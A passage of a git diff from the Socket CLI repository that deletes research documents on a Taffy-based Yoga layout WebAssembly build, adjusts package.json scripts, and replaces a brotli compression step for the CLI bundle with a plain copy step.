-node.setMeasureFunc((width, widthMode, height, heightMode) => { - const measured = measureText(text, width) - return { width: measured.width, height: measured.height } -}) - -// After (Taffy-based) - Pre-calculate and set explicitly -const measured = measureText(text, maxWidth) -node.setWidth(measured.width) -node.setHeight(measured.height) -``` - -#### 3. Border - -If your application uses border: - -```javascript -// Before (Yoga C++) -node.setBorder(Edge.All, 2) -node.setPadding(Edge.All, 10) - -// After (Taffy-based) - Combine into padding -node.setPadding(Edge.All, 12) // 2 (border) + 10 (padding) -``` - -### From Other Flexbox Implementations - -The API closely matches Yoga, which is widely used. Key differences from CSS flexbox: - -- Use method calls instead of CSS properties -- Use enum values instead of strings -- Must call `calculateLayout()` to trigger layout (not automatic) -- Read computed values with getters, not from style properties - -## Future Compatibility - -### Planned Improvements - -- [ ] Display property (Display.None for hiding elements) -- [ ] Aspect ratio support -- [ ] Gap (grid-gap) support -- [ ] Percentage-based sizing methods -- [ ] Auto-sizing methods -- [ ] Computed margin/padding getters - -### Requires Taffy Changes - -- [ ] Measure function integration -- [ ] Border in layout model -- [ ] Absolute positioning with positioning properties - -### Tracking Issues - -Track compatibility issues and feature requests: -- Implementation: [src/lib.rs](src/lib.rs) -- Adapter layer: [src/index.mjs](src/index.mjs) -- Tests: `.yoga-tests/` - -## References - -- **Yoga Layout API**: https://yogalayout.dev/docs/api -- **Taffy Documentation**: https://github.com/DioxusLabs/taffy -- **W3C Flexbox Spec**: https://www.w3.org/TR/css-flexbox-1/ -- **Our Implementation**: [src/lib.rs](src/lib.rs), [src/index.mjs](src/index.mjs) diff --git a/docs/yoga-layout/research/taffy-research.md b/docs/yoga-layout/research/taffy-research.md deleted file mode 100644 index fc0e6ce25..000000000 --- a/docs/yoga-layout/research/taffy-research.md +++ /dev/null @@ -1,483 +0,0 @@ -# Yoga Layout WASM - -**⚠️ STATUS: Research & Prototyping - Using Official Yoga C++ with Emscripten** - -This package builds Yoga Layout from the official C++ implementation using Emscripten, optimized for Socket CLI's terminal rendering needs. - -## Previous Research: Taffy-based Implementation - -We explored building a pure Rust implementation using [Taffy](https://github.com/DioxusLabs/taffy) to avoid C++ toolchain dependencies. While promising, we discovered critical blockers: - -- **Measure functions**: Required by Ink for text measurement, not supported by Taffy -- **Border layout**: Ink uses borders extensively, Taffy v0.6 doesn't include border in layout calculations - -**Decision**: Use official Yoga C++ with Emscripten for 100% compatibility with Ink and other Yoga consumers. - -**Research artifacts preserved**: See [TAFFY-RESEARCH.md](./TAFFY-RESEARCH.md) for the Taffy exploration, architecture, and compatibility analysis. - -## Table of Contents - -- [Why This Exists](#why-this-exists) -- [Architecture](#architecture) -- [Installation](#installation) -- [Usage](#usage) -- [API Compatibility](#api-compatibility) -- [Build System](#build-system) -- [Testing](#testing) -- [Performance](#performance) -- [Limitations](#limitations) -- [References](#references) - -## Why This Exists - -### Problem - -The original Yoga Layout requires: -- C++ toolchain (clang++) -- Emscripten SDK for WASM compilation -- Complex build dependencies -- Platform-specific binaries - -This creates friction for: -- CI/CD environments -- Cross-platform development -- Dependency management -- Build reproducibility - -### Solution - -This package replaces Yoga's C++ implementation with: -- **Taffy v0.6.0**: Pure Rust flexbox layout engine -- **wasm-bindgen**: Minimal JavaScript interop layer -- **No C++ toolchain**: Only Rust required -- **Smaller footprint**: ~237KB total (230KB WASM + 7KB JS) - -### Inspiration - -This approach mirrors Socket's successful use of pure Rust for other WASM modules: -- **Acorn parser**: Pure Rust alternative to C++ Acorn -- **Custom Node.js builds**: Rust-based patches and optimizations - -## Architecture - -``` -┌─────────────────────────────────────────────────────────────┐ -│ Application Layer │ -│ (Ink, or other Yoga users) │ -└─────────────────────┬───────────────────────────────────────┘ - │ - │ Yoga API (compatible) - │ -┌─────────────────────▼───────────────────────────────────────┐ -│ JavaScript Adapter Layer │ -│ (src/index.mjs) │ -│ │ -│ - Provides full Yoga API compatibility │ -│ - Handles tree management (parent/child tracking) │ -│ - Implements measure functions (stubs) │ -│ - Manages dirty tracking │ -└─────────────────────┬───────────────────────────────────────┘ - │ - │ wasm-bindgen bindings - │ -┌─────────────────────▼───────────────────────────────────────┐ -│ WASM Layer │ -│ (build/wasm/yoga.wasm) │ -│ │ -│ - Generated by wasm-bindgen from Rust │ -│ - Exports core layout methods │ -│ - ~230KB optimized with wasm-opt │ -└─────────────────────┬───────────────────────────────────────┘ - │ - │ Rust FFI - │ -┌─────────────────────▼───────────────────────────────────────┐ -│ Rust Core Layer │ -│ (src/lib.rs) │ -│ │ -│ - YogaNode wrapper around Taffy │ -│ - Maps Yoga API to Taffy types │ -│ - Handles enum conversions │ -└─────────────────────┬───────────────────────────────────────┘ - │ - │ Taffy API - │ -┌─────────────────────▼───────────────────────────────────────┐ -│ Taffy Layout Engine │ -│ (taffy v0.6.0) │ -│ │ -│ - Pure Rust flexbox implementation │ -│ - W3C spec compliant │ -│ - Zero C++ dependencies │ -└─────────────────────────────────────────────────────────────┘ -``` - -### Layer Responsibilities - -1. **Application Layer**: Uses Yoga API without modification -2. **JavaScript Adapter**: Fills gaps in WASM bindings (tree management, callbacks) -3. **WASM Layer**: Fast compiled layout calculations -4. **Rust Core**: Translates Yoga API to Taffy types -5. **Taffy Engine**: Core flexbox algorithm implementation - -## Installation - -### Prerequisites - -- **Rust 1.70+**: [Install Rust](https://www.rust-lang.org/tools/install) -- **wasm-opt**: [Install Binaryen](https://github.com/WebAssembly/binaryen) -- **Node.js 18+**: For building and testing - -### Building from Source - -```bash -# Install Rust target for WASM -rustup target add wasm32-unknown-unknown - -# Build WASM module -node scripts/build.mjs - -# Output will be in build/wasm/ -# - yoga.wasm (~230KB) -# - yoga.js (~7KB) -``` - -### Build Options - -```bash -# Force rebuild (ignore checkpoints) -node scripts/build.mjs --force - -# The build process includes: -# 1. Rust compilation with release-wasm-fast profile -# 2. wasm-bindgen JavaScript binding generation -# 3. wasm-opt aggressive size optimization -# 4. WASM validation and verification -``` - -## Usage - -### Basic Example - -```javascript -import Yoga from '@socketsecurity/yoga-layout' - -// Initialize WASM module -await Yoga.init() - -// Create root node -const root = Yoga.Node.create() -root.setWidth(500) -root.setHeight(300) -root.setFlexDirection(Yoga.FlexDirection.Row) - -// Create child nodes -const child1 = Yoga.Node.create() -child1.setFlexGrow(1) - -const child2 = Yoga.Node.create() -child2.setFlexGrow(2) - -root.insertChild(child1, 0) -root.insertChild(child2, 1) - -// Calculate layout -root.calculateLayout(undefined, undefined, Yoga.DIRECTION_LTR) - -// Read computed layout -console.log(child1.getComputedWidth()) // 166.67 -console.log(child2.getComputedWidth()) // 333.33 -``` - -### With Ink (React for CLIs) - -```javascript -import Yoga from '@socketsecurity/yoga-layout' -import { render } from 'ink' - -// Ink will automatically use Yoga for layout calculations -const { unmount } = render() -``` - -### Configuration - -```javascript -// Create config (optional) -const config = Yoga.Config.create() -config.setUseWebDefaults(true) - -// Create node with config -const node = Yoga.Node.create(config) -``` - -## API Compatibility - -This implementation aims for Yoga API compatibility while leveraging Taffy's pure Rust implementation. - -### ✅ Fully Supported - -- **Layout calculation**: `calculateLayout()`, all layout getters -- **Flex properties**: flexDirection, flexGrow, flexShrink, flexBasis, flexWrap -- **Alignment**: justifyContent, alignItems, alignContent, alignSelf -- **Sizing**: width, height, minWidth, minHeight, maxWidth, maxHeight -- **Spacing**: margin, padding (all edges) -- **Tree management**: insertChild, removeChild, getChild, getChildCount - -### ⚠️ Partial Support - -- **insertChild index**: Taffy appends children; index parameter tracked but may not affect layout order -- **Config options**: Stored but don't affect Taffy calculations (useWebDefaults, pointScaleFactor) -- **Experimental features**: No-op (Taffy doesn't have feature flags) - -### ❌ Not Supported - -- **Measure functions**: Stored but not integrated with layout (Taffy limitation) -- **Border**: Taffy v0.6 doesn't support border in layout calculations -- **Position**: Absolute positioning not yet implemented -- **Aspect ratio**: Not implemented in current wrapper -- **Gap (grid-gap)**: Not implemented in current wrapper - -See [API_COMPATIBILITY.md](./API_COMPATIBILITY.md) for detailed compatibility matrix. - -## Build System - -### Cargo Profile - -We use a custom `release-wasm-fast` profile optimized for WASM size: - -```toml -[profile.release-wasm-fast] -inherits = "release" -opt-level = "z" # Optimize for size -lto = "thin" # Thin LTO for faster builds -codegen-units = 1 # Single unit for better optimization -strip = true # Strip symbols -panic = "abort" # No unwinding (smaller code) -overflow-checks = false # Remove overflow checks -debug-assertions = false # Remove debug assertions -``` - -### RUSTFLAGS - -We enable modern WASM features for better performance: - -```bash -RUSTFLAGS=" - -C target-feature=+simd128 # SIMD (20-30% perf boost) - -C target-feature=+bulk-memory # Bulk memory operations - -C target-feature=+mutable-globals # Mutable globals - -C target-feature=+sign-ext # Sign extension - -C target-feature=+nontrapping-fptoint # Non-trapping float-to-int - -C target-feature=+reference-types # Reference types - -C overflow-checks=off # Disable overflow checks - -C debug-assertions=off # Disable debug assertions -" -``` - -**Note**: These flags require modern runtimes: -- Chrome 91+ -- Firefox 89+ -- Node.js 16+ -- Safari 15+ - -### wasm-opt Flags - -Aggressive optimization with wasm-opt (Binaryen): - -```bash -wasm-opt -Oz \ - --enable-simd \ - --enable-bulk-memory \ - --enable-sign-ext \ - --enable-mutable-globals \ - --enable-nontrapping-float-to-int \ - --enable-reference-types \ - --low-memory-unused \ - --flatten \ - --rereloop \ - --vacuum \ - --dce \ - --remove-unused-names \ - --remove-unused-module-elements \ - --strip-debug \ - --strip-dwarf \ - --strip-producers \ - --strip-target-features -``` - -### Build Phases - -1. **Rust compilation**: `cargo build --target wasm32-unknown-unknown --profile release-wasm-fast` -2. **JavaScript bindings**: `wasm-bindgen --target nodejs --out-dir build/pkg` -3. **Optimization**: `wasm-opt` with aggressive flags -4. **Verification**: Validate WASM magic number and size -5. **Export**: Copy to `build/wasm/` for distribution - -## Testing - -### Test Suite Approach - -We test against Yoga's official test suite using a submodule approach: - -``` -.yoga-tests/ # Git submodule (Yoga v3.1.0) -├── javascript/ -│ └── tests/ -│ ├── generated/ # Generated Yoga tests -│ │ ├── YGFlexTest.test.ts -│ │ ├── YGPaddingTest.test.ts -│ │ └── ... -│ └── YG*.test.ts # Manual Yoga tests -``` - -This mirrors Socket's testing approach: -- **Acorn**: Tests against test262 suite via submodule -- **Babel transforms**: Tests against Babel's unit tests via submodule - -### Running Tests - -```bash -# Run Yoga compatibility tests -npm test - -# Run specific test file -npm test -- YGFlexTest - -# Update test snapshots -npm test -- --update-snapshots -``` - -See [TESTING.md](./TESTING.md) for detailed testing documentation. - -## Performance - -### Size Comparison - -| Implementation | WASM Size | JS Size | Total | -|---------------|-----------|---------|-------| -| **Taffy (this)** | 230 KB | 7 KB | **237 KB** | -| Yoga (Emscripten) | 65 KB | 46 KB | 111 KB | - -**Trade-offs**: -- Taffy is 2.1x larger but eliminates C++ toolchain -- Larger WASM, smaller JS glue code -- No platform-specific binaries needed -- Reproducible builds across environments - -### Runtime Performance - -Taffy is designed for high performance: -- Pure Rust (no FFI overhead) -- SIMD optimizations -- Modern WASM features (bulk-memory, reference-types) -- Efficient memory layout - -Benchmarks TBD (see [TESTING.md](./TESTING.md)). - -## Limitations - -### Current Known Limitations - -1. **insertChild index behavior**: Taffy's `add_child()` appends children. The index parameter is tracked in the adapter layer but may not affect layout order in all cases. - -2. **Measure functions**: Yoga allows custom measure functions for leaf nodes. Taffy doesn't support this pattern directly. Measure functions are stored but not integrated with layout calculations. - -3. **Config options**: Yoga's config options (pointScaleFactor, experimentalFeatures, errata) are stored for API compatibility but don't affect Taffy's layout calculations. - -4. **Missing layout features** (can be added with additional Rust code): - - Border (Taffy v0.6 limitation) - - Absolute positioning - - Aspect ratio - - Gap (grid-gap) - - Display: none - -### Future Improvements - -- [ ] Implement measure function integration (may require Taffy fork) -- [ ] Add missing layout features (border, position, aspect ratio) -- [ ] Performance benchmarking suite -- [ ] Full Yoga test suite compatibility -- [ ] TypeScript type definitions -- [ ] Browser WASM target (currently Node.js only) - -## References - -### Documentation - -- **Yoga Layout**: https://yogalayout.dev/ - - Official documentation - - API reference - - Layout examples - -- **Taffy**: https://github.com/DioxusLabs/taffy - - Pure Rust flexbox engine - - W3C spec compliant - - Used by Dioxus UI framework - -- **Ink**: https://github.com/vadimdemedes/ink - - React for CLIs - - Primary use case for this package - -### Technical Resources - -- **WASM Bindgen**: https://rustwasm.github.io/wasm-bindgen/ - - Rust ↔ JavaScript interop - - WASM module generation - -- **Binaryen**: https://github.com/WebAssembly/binaryen - - wasm-opt optimizer - - WASM validation tools - -- **W3C Flexbox Spec**: https://www.w3.org/TR/css-flexbox-1/ - - Flexbox specification - - Layout algorithm details - -### Socket Implementation References - -- **Acorn WASM**: `../ultrathink/acorn/` - - Pure Rust parser - - WASM build patterns - - test262 test suite integration - -- **Socket CLI Build Infrastructure**: `@socketsecurity/build-infra` - - Shared build utilities - - Checkpoint system - - Environment setup - -### Related Projects - -- **yoga-wasm-web**: https://github.com/DioxusLabs/yoga-wasm-web - - Alternative WASM Yoga binding - - Uses original C++ Yoga with Emscripten - -- **stretch**: https://github.com/vislyhq/stretch - - Previous pure Rust flexbox engine - - Deprecated in favor of Taffy - -## Contributing - -This package is part of Socket CLI. For contribution guidelines, see the main [Socket CLI repository](https://github.com/SocketDev/socket-cli). - -### Development Workflow - -```bash -# Install dependencies -pnpm install - -# Build WASM -node scripts/build.mjs - -# Run tests -npm test - -# Force rebuild -node scripts/build.mjs --force -``` - -## License - -MIT License - Copyright (c) Socket Security - -This package uses: -- Taffy (MIT License) -- Yoga test suite (MIT License, Meta Platforms) diff --git a/docs/yoga-layout/research/testing.md b/docs/yoga-layout/research/testing.md deleted file mode 100644 index 4a4308039..000000000 --- a/docs/yoga-layout/research/testing.md +++ /dev/null @@ -1,567 +0,0 @@ -# Testing Yoga Layout (Taffy-based) - -This document explains the testing strategy for verifying Yoga API compatibility using Taffy as the underlying layout engine. - -## Table of Contents - -- [Overview](#overview) -- [Test Suite Structure](#test-suite-structure) -- [Running Tests](#running-tests) -- [Test Approach](#test-approach) -- [Expected Failures](#expected-failures) -- [Adding New Tests](#adding-new-tests) -- [Benchmarking](#benchmarking) -- [References](#references) - -## Overview - -We validate Yoga API compatibility by running Yoga's official test suite against our Taffy-based implementation. This approach mirrors Socket's testing strategy for other projects: - -- **Acorn**: Tests against ECMAScript test262 suite via submodule -- **Babel transforms**: Tests against Babel's unit tests via submodule - -### Why This Approach? - -1. **Authoritative**: Uses Yoga's official tests (same tests Facebook uses) -2. **Comprehensive**: ~950 tests covering all layout scenarios -3. **Continuous validation**: Ensures compatibility as we add features -4. **Regression detection**: Catches breaking changes immediately - -## Test Suite Structure - -### Yoga Test Submodule - -We use Yoga v3.1.0's JavaScript test suite as a submodule: - -``` -.yoga-tests/ # Git submodule -├── .git/ # Submodule metadata -├── javascript/ -│ ├── package.json # Yoga package.json -│ ├── src/ -│ │ ├── index.ts # Yoga entry point -│ │ ├── wrapAssembly.ts # WASM wrapper -│ │ └── generated/ -│ │ └── YGEnums.ts # Enum definitions -│ └── tests/ -│ ├── generated/ # Generated from HTML fixtures -│ │ ├── YGAbsolutePositionTest.test.ts -│ │ ├── YGAlignContentTest.test.ts -│ │ ├── YGAlignItemsTest.test.ts -│ │ ├── YGAlignSelfTest.test.ts -│ │ ├── YGAspectRatioTest.test.ts -│ │ ├── YGBorderTest.test.ts -│ │ ├── YGDimensionTest.test.ts -│ │ ├── YGDisplayTest.test.ts -│ │ ├── YGFlexDirectionTest.test.ts -│ │ ├── YGFlexTest.test.ts -│ │ ├── YGFlexWrapTest.test.ts -│ │ ├── YGGapTest.test.ts -│ │ ├── YGJustifyContentTest.test.ts -│ │ ├── YGMarginTest.test.ts -│ │ ├── YGMinMaxDimensionTest.test.ts -│ │ ├── YGPaddingTest.test.ts -│ │ ├── YGPercentageTest.test.ts -│ │ ├── YGRoundingTest.test.ts -│ │ ├── YGSizeOverflowTest.test.ts -│ │ └── YGStaticPositionTest.test.ts -│ ├── YGAlignBaselineTest.test.ts -│ ├── YGComputedBorderTest.test.ts -│ ├── YGComputedMarginTest.test.ts -│ ├── YGComputedPaddingTest.test.ts -│ ├── YGDirtiedTest.test.ts -│ ├── YGErrataTest.test.ts -│ ├── YGFlexBasisAuto.test.ts -│ ├── YGHasNewLayout.test.ts -│ ├── YGMeasureCacheTest.test.ts -│ ├── YGMeasureTest.test.ts -│ └── Benchmarks/ -│ └── YGBenchmark.test.ts -``` - -**Submodule Details**: -- **Repository**: https://github.com/facebook/yoga -- **Version**: v3.1.0 (tag) -- **Cloned to**: `.yoga-tests/` -- **Test count**: ~950 tests total - -### Our Test Runner - -``` -tests/ -├── yoga-compat.test.mjs # Main test runner -├── adapters/ -│ ├── yoga-to-taffy.mjs # Import adapter for our implementation -│ └── test-helpers.mjs # Common test utilities -└── snapshots/ # Test snapshots (expected vs actual) - ├── flex.snap - ├── padding.snap - └── ... -``` - -## Running Tests - -### Prerequisites - -```bash -# Install dependencies -pnpm install - -# Build WASM module -node scripts/build.mjs -``` - -### Basic Test Commands - -```bash -# Run all Yoga compatibility tests -npm test - -# Run specific test file -npm test -- --grep "YGFlexTest" - -# Run with verbose output -npm test -- --reporter=verbose - -# Update snapshots -npm test -- --update-snapshots -``` - -### Test Categories - -```bash -# Flex properties only -npm test -- --grep "Flex" - -# Padding and margin -npm test -- --grep "Padding|Margin" - -# Alignment tests -npm test -- --grep "Align" - -# Exclude known failures -npm test -- --grep "Flex" --invert --grep "Position|Border|Measure" -``` - -## Test Approach - -### 1. Import Adaptation - -Yoga tests import from `'yoga-layout'`. We use import remapping to substitute our implementation: - -```javascript -// tests/adapters/yoga-to-taffy.mjs -import Yoga from '../../src/index.mjs' - -// Initialize WASM -await Yoga.init() - -// Re-export with same interface -export default Yoga -export * from '../../src/enums.mjs' -``` - -### 2. Test Execution Pattern - -Each test follows this pattern: - -```javascript -test('flex_basis_flex_grow_column', () => { - const config = Yoga.Config.create() - let root - - try { - // Create node tree - root = Yoga.Node.create(config) - root.setWidth(100) - root.setHeight(100) - - const child = Yoga.Node.create(config) - child.setFlexGrow(1) - child.setFlexBasis(50) - root.insertChild(child, 0) - - // Calculate layout - root.calculateLayout(undefined, undefined, Direction.LTR) - - // Assert computed values - expect(root.getComputedWidth()).toBe(100) - expect(root.getComputedHeight()).toBe(100) - expect(child.getComputedTop()).toBe(0) - expect(child.getComputedHeight()).toBe(100) - } finally { - // Cleanup - root?.freeRecursive() - config?.free() - } -}) -``` - -### 3. Comparison Strategy - -We compare our implementation's output against expected values from Yoga: - -1. **Exact match**: Computed layout values should match within floating-point epsilon (0.001) -2. **Snapshot testing**: Store expected layouts and compare against actual -3. **Visual diffing**: Generate HTML visualizations for debugging - -### 4. Handling Floating Point - -Layout calculations involve floating-point arithmetic. We use epsilon comparison: - -```javascript -function expectClose(actual, expected, epsilon = 0.001) { - expect(Math.abs(actual - expected)).toBeLessThan(epsilon) -} -``` - -## Expected Failures - -### Known Unsupported Features - -Some tests will fail due to Taffy limitations. We track these as expected failures: - -#### 1. Border Tests (`YGBorderTest`) - -**Reason**: Taffy v0.6 doesn't include border in layout calculations. - -**Test Count**: ~50 tests - -**Status**: ❌ Expected failures - -**Workaround**: Convert border to padding in application code. - -**Example**: -```javascript -test.skip('border_flex_child', () => { - // Skipped: Taffy doesn't support border -}) -``` - -#### 2. Absolute Position Tests (`YGAbsolutePositionTest`) - -**Reason**: Absolute positioning not implemented in current wrapper. - -**Test Count**: ~80 tests - -**Status**: ❌ Expected failures - -**Future**: Could be implemented by mapping to Taffy's position support. - -**Example**: -```javascript -test.skip('absolute_layout_width_height_start_top', () => { - // Skipped: Absolute positioning not supported -}) -``` - -#### 3. Measure Function Tests (`YGMeasureTest`) - -**Reason**: Taffy doesn't provide measure function extension points. - -**Test Count**: ~30 tests - -**Status**: ⚠️ Partial failures - -**Workaround**: Pre-calculate sizes and set explicitly. - -**Example**: -```javascript -test.skip('measure_flex_child', () => { - // Skipped: Measure functions not integrated with layout -}) -``` - -#### 4. Aspect Ratio Tests (`YGAspectRatioTest`) - -**Reason**: Not yet implemented in wrapper. - -**Test Count**: ~40 tests - -**Status**: 🚧 Planned - -**Example**: -```javascript -test.skip('aspect_ratio_flex_grow', () => { - // Skipped: Aspect ratio not implemented -}) -``` - -#### 5. Gap Tests (`YGGapTest`) - -**Reason**: Not yet implemented in wrapper. - -**Test Count**: ~25 tests - -**Status**: 🚧 Planned - -**Example**: -```javascript -test.skip('gap_column', () => { - // Skipped: Gap not implemented -}) -``` - -### Expected Pass Rate - -| Category | Total Tests | Expected Passes | Pass Rate | -|----------|-------------|-----------------|-----------| -| Flex properties | ~200 | ~195 | 97.5% | -| Alignment | ~150 | ~145 | 96.7% | -| Sizing | ~180 | ~175 | 97.2% | -| Spacing (padding/margin) | ~140 | ~140 | 100% | -| Border | ~50 | ~0 | 0% (unsupported) | -| Position | ~80 | ~0 | 0% (unsupported) | -| Measure | ~30 | ~5 | 16.7% (partial) | -| Aspect Ratio | ~40 | ~0 | 0% (not implemented) | -| Gap | ~25 | ~0 | 0% (not implemented) | -| Other | ~55 | ~50 | 90.9% | -| **Total** | **~950** | **~710** | **74.7%** | - -## Adding New Tests - -### 1. Add Test to Our Suite - -Create a new test file in `tests/`: - -```javascript -// tests/custom-layout.test.mjs -import { test } from 'node:test' -import { strict as assert } from 'node:assert' -import Yoga from '../src/index.mjs' - -await Yoga.init() - -test('custom layout scenario', () => { - const root = Yoga.Node.create() - root.setFlexDirection(Yoga.FlexDirection.Row) - // ... test implementation -}) -``` - -### 2. Add Snapshot Test - -Generate expected layout snapshot: - -```javascript -test('flex layout snapshot', () => { - const layout = computeLayout(root) - expect(layout).toMatchSnapshot() -}) -``` - -### 3. Visual Testing - -Generate HTML visualization for manual verification: - -```javascript -function generateHTML(node, depth = 0) { - const layout = node.getComputedLayout() - return ` -

- ` -} -``` - -## Benchmarking - -### Layout Performance - -Benchmark layout calculation performance: - -```javascript -// tests/benchmarks/layout-perf.mjs -import { performance } from 'node:perf_hooks' -import Yoga from '../../src/index.mjs' - -await Yoga.init() - -function benchmarkLayout(nodeCount) { - const root = createComplexTree(nodeCount) - - const start = performance.now() - root.calculateLayout(1000, 1000, Yoga.DIRECTION_LTR) - const end = performance.now() - - return end - start -} - -// Run benchmark -console.log('Layout performance (1000 nodes):', benchmarkLayout(1000), 'ms') -``` - -### Comparing with Yoga - -Compare our performance against official Yoga: - -```bash -# Benchmark our implementation -npm run benchmark - -# Compare against Yoga C++ -cd .yoga-tests/javascript -npm run benchmark -``` - -### Expected Performance - -Taffy is designed for high performance: -- **Pure Rust**: No FFI overhead -- **SIMD**: 20-30% performance boost on modern CPUs -- **Efficient algorithm**: O(n) layout calculation - -Target performance: Within 10% of Yoga C++ for common layouts. - -## Debugging Failed Tests - -### 1. Visual Debugging - -Generate HTML visualization: - -```bash -npm run test:visual -- YGFlexTest -``` - -Opens browser with side-by-side comparison: -- Left: Expected layout (Yoga C++) -- Right: Actual layout (our implementation) - -### 2. Verbose Output - -Run test with detailed logging: - -```bash -DEBUG=yoga:* npm test -- --reporter=verbose -``` - -### 3. Single Test Isolation - -Run single test in isolation: - -```javascript -test.only('specific_flex_scenario', () => { - // ... test implementation -}) -``` - -### 4. Layout Diffing - -Compare computed layouts: - -```javascript -function diffLayouts(expected, actual) { - console.log('Expected:', JSON.stringify(expected, null, 2)) - console.log('Actual:', JSON.stringify(actual, null, 2)) - console.log('Diff:', { - left: actual.left - expected.left, - top: actual.top - expected.top, - width: actual.width - expected.width, - height: actual.height - expected.height, - }) -} -``` - -## Continuous Integration - -### GitHub Actions - -Run tests in CI: - -```yaml -# .github/workflows/test.yml -name: Test - -on: [push, pull_request] - -jobs: - test: - runs-on: ubuntu-latest - steps: - - uses: actions/checkout@v4 - with: - submodules: recursive # Clone .yoga-tests/ - - - name: Setup Rust - uses: actions-rust-lang/setup-rust-toolchain@v1 - with: - toolchain: stable - target: wasm32-unknown-unknown - - - name: Setup Node - uses: actions/setup-node@v4 - with: - node-version: 20 - - - name: Install dependencies - run: pnpm install - - - name: Build WASM - run: node scripts/build.mjs - - - name: Run tests - run: npm test -``` - -### Coverage Reporting - -Generate coverage report: - -```bash -npm run test:coverage -``` - -## References - -### Test Resources - -- **Yoga Test Suite**: https://github.com/facebook/yoga/tree/main/javascript/tests -- **Yoga Test Generator**: https://github.com/facebook/yoga/tree/main/gentest -- **W3C Flexbox Tests**: https://github.com/web-platform-tests/wpt/tree/master/css/css-flexbox - -### Related Testing Approaches - -- **Acorn test262 integration**: `../ultrathink/acorn/tests/` -- **Socket CLI test patterns**: `../../packages/cli/test/` -- **Vitest documentation**: https://vitest.dev/ - -### Tools - -- **Vitest**: https://vitest.dev/ (fast test runner) -- **Node.js Test Runner**: https://nodejs.org/api/test.html (built-in alternative) -- **Snapshot Testing**: https://vitest.dev/guide/snapshot.html - -## Contributing - -### Adding Test Coverage - -1. Identify untested Yoga API surface -2. Check if Taffy supports the feature -3. Write test following existing patterns -4. Run test and verify expected behavior -5. Add expected failure annotation if unsupported - -### Fixing Failing Tests - -1. Identify root cause (our bug vs Taffy limitation) -2. If our bug: Fix in Rust or adapter layer -3. If Taffy limitation: Document and mark as expected failure -4. Add regression test to prevent reoccurrence - -### Test Guidelines - -- **One assertion per test**: Makes failures easier to diagnose -- **Descriptive names**: Follow Yoga's naming convention -- **Cleanup resources**: Always call `freeRecursive()` in finally block -- **Epsilon comparison**: Use `expectClose()` for floating-point -- **Document skipped tests**: Explain why test is skipped with reference diff --git a/package.json b/package.json index 9dc95aa98..f94b05b1b 100644 --- a/package.json +++ b/package.json @@ -54,7 +54,6 @@ "@types/yargs-parser": "catalog:", "@typescript-eslint/parser": "catalog:", "@vitest/coverage-v8": "catalog:", - "@yao-pkg/pkg": "catalog:", "browserslist": "catalog:", "chalk-table": "catalog:", "cmd-shim": "catalog:", @@ -170,7 +169,6 @@ "build:binaries": "node scripts/build-binaries.mjs", "build:binaries:dev": "node scripts/build-binaries.mjs --dev", "build:sea": "node scripts/build-binaries.mjs --sea", - "build:smol": "node scripts/build-binaries.mjs --smol", "build:wasm": "node scripts/build-binaries.mjs --wasm", "dev": "pnpm run build:watch", "// Quality Checks": "", @@ -191,12 +189,9 @@ "cover": "pnpm --filter @socketsecurity/cli run test:unit:coverage --", "cover:all": "pnpm --filter \"./packages/**\" run cover", "// WASM": "", - "wasm:benchmark": "node scripts/wasm/benchmark-build.mjs", - "wasm:build": "node scripts/wasm/build-unified-wasm.mjs", - "wasm:build:dev": "node scripts/wasm/build-unified-wasm.mjs --dev", - "wasm:optimize": "node scripts/wasm/optimize-embedded-wasm.mjs", - "wasm:optimize:aggressive": "node scripts/wasm/optimize-embedded-wasm.mjs --aggressive", - "wasm:setup": "node scripts/wasm/setup-build-env.mjs", + "wasm:extract": "node scripts/wasm/extract-yoga.mjs", + "wasm:optimize": "node scripts/wasm/optimize-yoga.mjs", + "wasm:optimize:aggressive": "node scripts/wasm/optimize-yoga.mjs --aggressive", "// Maintenance": "", "clean": "pnpm --filter \"./packages/**\" run clean", "clean:cache": "node scripts/clean-cache.mjs", diff --git a/packages/cli-with-sentry/.config/esbuild.index.config.mjs b/packages/cli-with-sentry/.config/esbuild.index.config.mjs index 7b576b07a..f3b91305d 100644 --- a/packages/cli-with-sentry/.config/esbuild.index.config.mjs +++ b/packages/cli-with-sentry/.config/esbuild.index.config.mjs @@ -1,6 +1,6 @@ /** * esbuild configuration for Socket CLI with Sentry index loader. - * Builds the brotli decompression loader that executes the compressed CLI. + * Builds the loader that executes the CLI bundle. */ import path from 'node:path' diff --git a/packages/cli-with-sentry/scripts/build.mjs b/packages/cli-with-sentry/scripts/build.mjs index ea218c962..052da82a0 100644 --- a/packages/cli-with-sentry/scripts/build.mjs +++ b/packages/cli-with-sentry/scripts/build.mjs @@ -61,17 +61,17 @@ async function main() { } logger.success('Built shadow npm inject') - // Compress CLI. - logger.info('Compressing CLI...') - result = await spawn('node', ['scripts/compress-cli.mjs'], { + // Copy CLI to dist. + logger.info('Copying CLI to dist...') + result = await spawn('node', ['scripts/copy-cli.mjs'], { shell: WIN32, stdio: 'inherit', cwd: rootPath, }) if (result.code !== 0) { - throw new Error(`CLI compression failed with exit code ${result.code}`) + throw new Error(`CLI copy failed with exit code ${result.code}`) } - logger.success('Compressed CLI') + logger.success('Copied CLI to dist') // Copy data directory from packages/cli. logger.info('Copying data/ from packages/cli...') diff --git a/packages/cli-with-sentry/scripts/compress-cli.mjs b/packages/cli-with-sentry/scripts/compress-cli.mjs deleted file mode 100644 index af9fae085..000000000 --- a/packages/cli-with-sentry/scripts/compress-cli.mjs +++ /dev/null @@ -1,52 +0,0 @@ -/** - * @fileoverview Compress build/cli.js with brotli to dist/cli.js.bz. - * - * This script compresses the CLI bundle to reduce npm package size - * from ~13MB to ~1.7MB (87% reduction). - * - * The compressed file is decompressed at runtime by dist/index.js. - */ - -import { mkdirSync, readFileSync, writeFileSync } from 'node:fs' -import path from 'node:path' -import { fileURLToPath } from 'node:url' -import { brotliCompressSync } from 'node:zlib' - -import { getDefaultLogger } from '@socketsecurity/lib/logger' - -const __dirname = path.dirname(fileURLToPath(import.meta.url)) -const rootPath = path.join(__dirname, '..') -const buildPath = path.join(rootPath, 'build') -const distPath = path.join(rootPath, 'dist') - -const cliPath = path.join(buildPath, 'cli.js') -const cliBzPath = path.join(distPath, 'cli.js.bz') - -const logger = getDefaultLogger() -logger.log('') -logger.step('Compressing CLI with brotli...') - -// Ensure dist/ directory exists. -mkdirSync(distPath, { recursive: true }) - -// Read the uncompressed CLI from build/. -const cliCode = readFileSync(cliPath) -const originalSize = cliCode.length - -// Compress with brotli (max quality for best compression). -const compressed = brotliCompressSync(cliCode, { - params: { - [0]: 11, // BROTLI_PARAM_QUALITY: 11 (max 